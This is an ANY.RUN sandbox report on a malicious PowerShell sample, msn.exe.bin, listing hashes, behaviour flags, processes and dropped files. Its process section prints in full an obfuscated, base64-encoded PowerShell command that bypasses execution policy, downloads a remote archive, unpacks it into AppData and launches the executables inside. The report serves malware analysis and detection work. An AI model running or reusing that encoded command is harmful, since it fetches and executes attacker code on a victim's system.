Malware analysis msn.exe.bin Malicious activity | ANY.RUN

Add for printing

File name:	msn.exe.bin
Full analysis:	https://app.any.run/tasks/e2e9b04f-2112-443b-b158-2a0c2f32c9e1
Verdict:	Malicious activity
Analysis date:	December 22, 2024, 11:55:53
OS:	Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME:	text/plain
File info:	ASCII text, with very long lines (10037), with no line terminators
MD5:	ECD42B9A66A65EB2580D4B217E64D081
SHA1:	B145917F9AD9E4CFD22E4CC2005D1DF1DAB3B808
SHA256:	56F678FFF2C91FB98715F13E55699D5C86DD9F2A595BD5361ADBF554E472A840
SSDEEP:	192:OsiVEDiMOoUOU+ZIx9RkHOoiR1z3hekLOolAIABXOoEHPuGOGhGmZ:Osiy0ofUSuoizz3huolI+oPhGhGmZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 60 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Changes powershell execution policy (Bypass)
  - powershell.exe (PID: 5432)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 5432)
  - powershell.exe (PID: 6436)
- Downloads the requested resource (POWERSHELL)
  - powershell.exe (PID: 6436)
SUSPICIOUS
- Starts POWERSHELL.EXE for commands execution
  - powershell.exe (PID: 5432)
- BASE64 encoded PowerShell command has been detected
  - powershell.exe (PID: 5432)
- Writes data to a memory stream (POWERSHELL)
  - powershell.exe (PID: 6436)
- Application launched itself
  - powershell.exe (PID: 5432)
- Base64-obfuscated command line is found
  - powershell.exe (PID: 5432)
- Writes data into a file (POWERSHELL)
  - powershell.exe (PID: 6436)
- Creates new GUID (POWERSHELL)
  - powershell.exe (PID: 6436)
- Process drops legitimate windows executable
  - powershell.exe (PID: 6436)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 6436)
- Drops 7-zip archiver for unpacking
  - powershell.exe (PID: 6436)
- The process drops C-runtime libraries
  - powershell.exe (PID: 6436)
INFO
- Disables trace logs
  - powershell.exe (PID: 6436)
- Gets data length (POWERSHELL)
  - powershell.exe (PID: 6436)
- Checks proxy server information
  - powershell.exe (PID: 6436)
- The sample compiled with russian language support
  - powershell.exe (PID: 6436)
- The process uses the downloaded file
  - powershell.exe (PID: 6436)
- The sample compiled with english language support
  - powershell.exe (PID: 6436)
- The executable file from the user directory is run by the Powershell process
  - msn.exe (PID: 7056)
- Checks supported languages
  - msn.exe (PID: 7056)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

128

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

5432

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\msn.exe.bin.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

6436

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkACgAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIABNAEUATQBvAFIAeQAnACsAJwBTAFQAcgBFAEEAbQAgAC0AVgBhAGwAdQBlACAAKAAmACgANgBTAHYAewAyAH0AewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAZQBjACcAKwAnAHQAbABUAFYALABsAFQAVgBPAGIAagBsAFQAVgAsAGwAVABWAE4AZQB3AC0AbABUAFYAKQAgACgANgBTAHYAewAyAH0AewAzAH0AewAxAH0AJwArACcAewAwAH0ANgBTAHYALQBmACAAbABUAFYAJwArACcAYQBtAGwAVABWACwAbABUAFYAUwB0AHIAZQBsAFQAVgAsAGwAVABWAFMAeQBzAGwAVABWACwAbABUAFYAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBsAFQAVgApACkACgAgACAAIAAgAEQAeQBFAHsATQBlAG0AQgBVAG0AbwByAHkAUwBUAHIAQgBVAG0AZQBhAG0AfQAuACgANgBTAHYAewAwAH0AewAxAH0ANgBTAHYAIAAtAGYAbABUAFYAVwBsAFQAVgAsAGwAJwArACcAVABWAHIAaQB0AGUAbABUAFYAKQAuAEkAbgB2AG8AJwArACcAawBlACgARAB5AEUAewBaAEkAQgBVAG0AcABEAGEAVABBAH0ALAAgADAALAAgAEQAeQBFAHsAWgBpAFAAQgBVAG0ARABCAFUAbQBBAHQAYQB9AC4ANgBTAHYAbABlAG4ARwBCAFUAbQBUAEgANgBTAHYAKQAKACAAIAAgACAARAB5AEUAewBtAEUAbQBPAFIAQgBVAG0AWQBCAFUAbQBTAHQAQgBVAG0AUgBFAEIAVQBtAEEATQB9AC4ANgBTAHYAcwBCACcAKwAnAFUAbQBFAGUAJwArACcAawA2AFMAdgAoADAALAAgACAAKABWAEEAUgBJAEEAQgBMAEUAIAAoADYAUwB2ADgAbQBBADYAUwB2ACsANgBTAHYARgBaADYAUwB2ACkAIAApAC4AdgBhAGwAVQBlADoAOgA2AFMAdgBiAEIAVQBtAGUARwBJAE4ANgBTAHYAKQAKAAoAIAAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFUATgBpAHEAdQBFAEYATwBMAGQARQBSAG4AQQBNAGUAIAAtAFYAYQBsAHUAZQAgACgARAB5AEUAOABhAHAAQwA6ADoAKAA2AFMAdgB7ADEAfQB7ADAAfQB7ADIAfQA2AFMAdgAnACsAJwAgAC0AZgBsAFQAVgB1AGwAVABWACwAbABUAFYATgBlAHcARwBsAFQAVgAsAGwAVABWAGkAZABsAFQAVgApAC4ASQBuAHYAbwBrAGUAKAApAC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAdgAtAGYAbABUAFYAVABsAFQAJwArACcAVgAsAGwAVABWAG8AbABUAFYALABsAFQAVgBTAHQAcgBpAG4AZwBsAFQAVgApAC4ASQBuAHYAbwBrAGUAKAApACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAQQBwAFAARABBAFQAYQBQAGEAVABIACAALQBWAGEAbAB1AGUAIAAoAEQAeQBFAGMARwAwAFEAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUACcAKwAnAFYAZQBsAFQAVgAsAGwAVABWAEMAbwBtAGIAaQBuACcAKwAnAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAZQBCAFUAbQBOAEIAVQBtAFYAOgBsAG8AYwBBAEwAQgBVAG0AQQBQAFAARABBAHQAQQB9ACwAIABEAHkARQB7AFUAJwArACcAbgBJAHEAdQBFAEIAVQBtAEYATwBCAFUAbQAnACsAJwBMAEQAZQBSAG4AQgBVAG0AQQBNAEUAfQAnACsAJwApACkACgAgACAAIAAgAC4AKAA2AFMAdgB7ADEAfQB7ADAAfQA2AFMAdgAgAC0AZgBsAFQAVgBJAHQAJwArACcAZQBtAGwAVABWACwAJwArACcAbABUAFYATgBlAHcALQBsAFQAVgApACAALQBJAHQAZQBtAFQAeQBwAGUAIAAoADYAUwB2AHsAMAB9AHsAMgAnACsAJwB9AHsAMQB9ADYAUwB2ACcAKwAnAC0AZgBsAFQAVgBEAGkAcgBsAFQAVgAsAGwAVABWAHkAJwArACcAbABUAFYALABsAFQAVgBlAGMAdABvAHIAbABUAFYAKQAgAC0AUABhAHQAaAAgAEQAeQBFAHsAYQBwAEIAVQBtAFAAQgBVAG0AZABhAFQAYQBCAFUAbQBQAGEAVABoAH0AIAAtAEYAbwByAGMAZQAgAHoAbgBxACAALgAoADYAUwB2AHsAMQB9AHsAMAB9ADYAUwB2ACAALQBmACAAbABUAFYAdQB0AC0ATgB1AGwAbABsAFQAVgAsAGwAVABWAE8AbABUAFYAKQAKAAoAIAAgACAAIABTAGUAdAAtAFYAJwArACcAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AJwArACcAZQAgAHQAZQBNAFAAWgBJAHAAUABBAHQAJwArACcAaAAgAC0AVgBhAGwAdQBlACAAKAAoACAAZwBjAGkAIAAgAHYAYQBSAGkAQQBiAGwARQA6AEMAZwAwAFEAIAAgACkALgBWAGEAbAB1AGUAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAbwBtAGIAaQBuAGUAbABUAFYALABsAFQAVgBDAGwAVABWACkAJwArACcALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsARQBuAHYAQgBVAG0AOgB0AEUAQgBVAG0AbQAnACsAJwBwAH0ALAAgADYAUwB2AEQAeQBFAHUAbgBpACcAKwAnAHEAdQBlAEYAbwBsAGQAZQByAE4AYQBtACcAKwAnAGUALgB6AGkAcAA2AFMAdgApACkACgAgACAAIAAgACAAIAAoACAAIABnAEMAaQAgACgANgBTAHYAdgBBADYAUwB2ACsANgBTAHYAcgA2AFMAdgArADYAUwB2AGkAQQBiAGwAZQA6AFUAYgAyAEcAVAA2AFMAdgApACkALgBWAEEAbAB1AGUAOgA6ACgANgBTAHYAewAxAH0AewAzAH0AewAyAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUAFYAbABCAHkAdABlAHMAbABUAFYALABsAFQAVgBXAHIAaQAnACsAJwB0AGwAVABWACwAbABUAFYAbABsAFQAVgAsACcAKwAnAGwAVABWAGUAQQBsAFQAVgApAC4ASQBuAHYAbwBrAGUAKABEAHkARQB7AHQAZQBtAHAAWgBJAHAAQgBVAG0AcABBAEIAVQBtAFQAaAB9ACwAIABEAHkARQB7AG0AZQBNAG8AQgBVAG0AUgBZAEIAVQBtAFMAdABSAEIAVQBtAEUAYQBNAH0ALgAoADYAUwB2AHsAMQB9AHsAMAB9ADYAUwB2AC0AZgBsAFQAVgByAGEAeQBsAFQAVgAsAGwAVABWAFQAbwBBAHIAbABUAFYAKQAuAEkAbgB2AG8AawBlACgAKQApAAoACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAUwBoAGUATABMACAALQBWAGEAbAB1AGUAIAAoAC4AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQA2AFMAdgAgAC0AZgBsAFQAVgBqAGUAYwB0AGwAVABWACwAbABUAFYATgBlAHcALQBsAFQAVgAsAGwAVABWAE8AYgBsAFQAVgApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgANgBTAHYAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxACcAKwAnAH0ANgBTAHYALQBmAGwAVABWAHAAbABpAGMAbABUAFYALABsAFQAVgBuAGwAVABWACwAbABUAFYAUwBoAGUAbABsAC4AQQBwAGwAVAAnACsAJwBWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAHQAaQBvAGwAVABWACkAKQAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB6AGkAcABGAG8AbABkAEUAUgAgAC0AVgBhAGwAdQBlACAAKABEAHkARQB7AHMAaABCAFUAbQBlAGwAbAB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAJwArACcAdgAnACsAJwAgAC0AZgBsAFQAVgBOAGEAbQBsAFQAVgAsAGwAVABWAGUAUwBwAGEAbABUAFYALABsAFQAVgBjAGUAbABUAFYAKQAuAEkAbgB2AG8AawBlACgARAB5AEUAewB0AEUAbQBwAHoAQgBVAG0ASQBQAHAAQQBCAFUAbQBUAGgAfQApACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAARABlAHMAdAAnACsAJwBJAE4AYQBUAEkATwBuAGYATwBMAGQAZQByACAALQBWAGEAbAB1AGUAIAAoAEQAeQBFAHsAcwBCAFUAbQBoAGUAbABsAH0ALgAoADYAUwB2AHsAMAB9AHsAMQB9AHsAMgB9ADYAUwB2ACAALQBmACAAbABUAFYATgBhAG0AZQBTAHAAYQBsAFQAVgAsAGwAVABWAGMAbABUAFYALABsAFQAVgBlAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAYQBQAEIAVQBtAFAARABCAFUAbQBBAHQAQgBVAG0AQQBQAGEAVABIAH0AKQApAAoAIAAgACAAIABEAHkARQB7AEQAZQAnACsAJwBCAFUAbQBTAFQAaQBCAFUAbQBOAGEAVABpAG8AQgBVAG0ATgBGAE8ATABkAEUAcgB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEMAbwBwAHkASABsAFQAVgAsAGwAVABWAGUAcgBlAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAWgBpAFAAQgBVAG0ARgBPAEwAQgBVAG0ARABCAFUAbQBlAHIAfQAuACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAdABlAG0AcwBsAFQAVgAsAGwAVABWAEkAbABUAFYAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAMgAwACkAIAAgAAoACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbAAnACsAJwBlACAALQBOAGEAbQBlACAARQB4AEUARgBpAGwAZQBzACAALQAnACsAJwBWAGEAbAB1AGUAIAAoACYAKAA2AFMAJwArACcAdgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQB7ADQAfQA2AFMAdgAtAGYAbABUAFYASQBsAFQAVgAsAGwAVABWAEcAbABUAFYALABsAFQAVgBlAHQALQBsAFQAVgAsAGwAVABWAEMAaABpAGwAZABsAFQAVgAsAGwAVABWACcAKwAnAHQAZQBtAGwAVABWACkAIAAtACcAKwAnAEYAaQBsAHQAZQByACAAKgAuAEIAVQBtAGUAWABFACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAARAB5AEUAewBhAFAAQgBVAG0AcABCAFUAbQBkAGEAQgBVAG0AVABBAFAAQQBUAGgAfQApAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACcAKwAnACAAKABEAHkARQB7AEUAQgBVAG0AeABFAEYASQBCAFUAbQBsAGUAfQAgAGkAbgAgAEQAeQBFAHsAZQBCAFUAbQAnACsAJwBYAGUARgBpAGwAQgBVAG0AZQBTAH0AKQAgAHsACgAgACAAIAAgACAAIAAgACAALgAoADYAUwB2AHsAMAB9AHsAMQB9AHsAMgB9ADYAUwB2AC0AZgAgAGwAVABWAFMAdABsAFQAVgAsAGwAVAAnACsAJwBWAGEAcgB0AC0AUAByAG8AYwBsAFQAVgAsAGwAVABWAGUAcwBzAGwAVABWACkAIAAtAEYAaQBsAGUAUABhAHQAaAAgAEQAeQBFAHsARQBYAEIAVQBtAEUARgBJAEIAVQBtAEwAZQB9AC4ANgBTAHYARgB1AEIAVQBtAGwAbABuAEIAVQBtAEEAbQBFADYAUwB2ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIAAtAFcAYQBpAHQACgAgACAAIAAgAH0ACgAKAH0AKQAKAAoAJgAgAEQAeQBFAHsAcwBDAFIAaQBwAHQAQgBVAG0AQgBMAEIAVQBtAE8AYwBrAH0AIAA+ACAARAB5AEUAewBuAHUAQgBVAG0ATABsAH0AIAAyAD4AJgAxAAoAJwApACAALQByAEUAcABMAEEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADYANgArAFsAQwBoAEEAcgBdADgANQArAFsAQwBoAEEAcgBdADEAMAA5ACkALABbAEMAaABBAHIAXQA5ADYALQByAEUAcABMAEEAYwBlACAAJwA2AFMAdgAnACwAWwBDAGgAQQByAF0AMwA0ACAAIAAtAGMAUgBFAHAATABBAEMAZQAnAEQAeQBFACcALABbAEMAaABBAHIAXQAzADYAIAAtAGMAUgBFAHAATABBAEMAZQAgACcAegBuAHEAJwAsAFsAQwBoAEEAcgBdADEAMgA0ACAAIAAtAGMAUgBFAHAATABBAEMAZQAnAGwAVABWACcALABbAEMAaABBAHIAXQAzADkAKQAgACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\8210ce597ae395018d4bee011b11fec5\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\598d972709fb08eaebd36223a4662d59\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\e6a1a4dc24dbc6f8a923509d04878cfd\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll

7056

"C:\Users\admin\AppData\Local\f8dac2c7-f3cf-499a-87ed-02dee6800c80\msn.exe"

C:\Users\admin\AppData\Local\f8dac2c7-f3cf-499a-87ed-02dee6800c80\msn.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Live Messenger

Exit code:

Version:

8.5.1235.0517

Modules

Images
c:\users\admin\appdata\local\f8dac2c7-f3cf-499a-87ed-02dee6800c80\msn.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll

Add for printing

Total events

6 465

Read events

6 464

Write events

Delete events

Modification events


(PID) Process:	(6436) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:	write	Name:	{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
Value: 0100000000000000254D7F7D6854DB01

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
6436	powershell.exe	C:\Users\admin\AppData\Local\f8dac2c7-f3cf-499a-87ed-02dee6800c80\pjnbsh		—
		MD5:—	SHA256:—
5432	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF135622.TMP		binary
		MD5:D040F64E9E7A2BB91ABCA5613424598E	SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6436	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5s2l22py.c24.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6436	powershell.exe	C:\Users\admin\AppData\Local\f8dac2c7-f3cf-499a-87ed-02dee6800c80\Microsoft.Developer.IdentityService.GitHubProvider.UI.dll		executable
